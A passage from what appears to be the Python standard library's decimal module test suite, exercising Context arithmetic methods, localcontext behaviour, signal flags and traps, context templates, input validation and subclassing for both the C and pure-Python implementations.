Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
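# three-argument (modular) power, passed by keyword: 2**8 % 5 == 1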
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontext_kwargs(self):
with self.decimal.localcontext(
prec=10, rounding=ROUND_HALF_DOWN,
Emin=-20, Emax=20, capitals=0,
clamp=1
) as ctx:
self.assertEqual(ctx.prec, 10)
self.assertEqual(ctx.rounding, self.decimal.ROUND_HALF_DOWN)
self.assertEqual(ctx.Emin, -20)
self.assertEqual(ctx.Emax, 20)
self.assertEqual(ctx.capitals, 0)
self.assertEqual(ctx.clamp, 1)
self.assertRaises(TypeError, self.decimal.localcontext, precision=10)
self.assertRaises(ValueError, self.decimal.localcontext, Emin=1)
self.assertRaises(ValueError, self.decimal.localcontext, Emax=-1)
self.assertRaises(ValueError, self.decimal.localcontext, capitals=2)
self.assertRaises(ValueError, self.decimal.localcontext, clamp=2)
self.assertRaises(TypeError, self.decimal.localcontext, rounding="")
self.assertRaises(TypeError, self.decimal.localcontext, rounding=1)
self.assertRaises(TypeError, self.decimal.localcontext, flags="")
self.assertRaises(TypeError, self.decimal.localcontext, traps="")
self.assertRaises(TypeError, self.decimal.localcontext, Emin="")
self.assertRaises(TypeError, self.decimal.localcontext, Emax="")
def test_local_context_kwargs_does_not_overwrite_existing_argument(self):
ctx = self.decimal.getcontext()
ctx.prec = 28
with self.decimal.localcontext(prec=10) as ctx2:
self.assertEqual(ctx.prec, 28)
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
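# The saved context must be restored even when the name bound by the
# with statement is deleted inside the block.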
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
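# Helper that records a signal in a way that works for both implementations:
# _decimal has no _raise_error(), so set the flag directly and raise manually
# if the signal is trapped.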
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
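# exception classes have no natural ordering; sort both lists by id()
# so they can be compared element-wise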
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
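# Ordering comparisons with floats raise once the FloatOperation trap is
# set; (in)equality comparisons never raise, they only set the flag.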
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation = self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
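# Remember the exception class and re-raise it only after the shared
# context templates have been restored in the finally clause.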
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
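# Expand a plain list of signals into the {signal: bool} mapping
# that Context expects.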
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
